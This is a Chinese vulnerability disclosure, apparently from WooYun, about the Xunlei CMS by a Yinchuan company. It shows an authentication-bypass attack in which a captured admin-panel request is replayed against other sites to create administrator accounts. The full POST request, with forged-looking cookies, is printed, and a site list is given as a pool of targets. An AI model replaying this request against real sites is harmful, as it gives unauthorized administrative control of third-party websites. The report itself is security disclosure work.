漏洞详情

披露状态:

2014-02-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-03-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

银川迅雷网络有限公司
官网:www.ycxl.net

详细说明:

UX9$$FHDUCKECQVN1~FIBKW.jpg



先找一个迅雷CMS的后台进入 添加管理员 然后抓包

ZVSHR)@)}7M})3PI41FW05U.jpg



(MAPIPZG%COT2(VDUJ%QS$O.jpg

然后换成另外一个迅雷CMS的网址 点击GO

~1IV58ER$$GFDL8~%C69DFM.jpg

添加成功

DN2G@VD2E8E%IL]WOP1@@KJ.jpg

再换一个

9WD2]B1Y_H[@WXYHG079$`M.jpg

成功添加

VIWDJC8P4W_EM2%@83}[2EK.jpg



2U~N]6@@9[C~$W])_8UY65N.jpg

添加成功



POST /admin/Admin_User.asp?action=savenew HTTP/1.1
Host: ******
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:24.0) Gecko/20100101 Firefox/24.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://*****/admin/Admin_User.asp?action=add
Cookie: ASPSESSIONIDSSAARRCR=CANNHNEDCDIOIDFLOCNBMCFL; cmsname=admin; cmsid=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 50

username2=账号&password2=密码&Submit=%CC%ED+%BC%D3





http://www.ycxl.net/index.php?m=Article&a=index&id=22 这里的网站都是迅雷CMS的

漏洞证明:

VIWDJC8P4W_EM2%@83}[2EK.jpg



2U~N]6@@9[C~$W])_8UY65N.jpg

添加成功

修复方案:

你们更专业

版权声明:转载请注明来源 浅蓝@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价: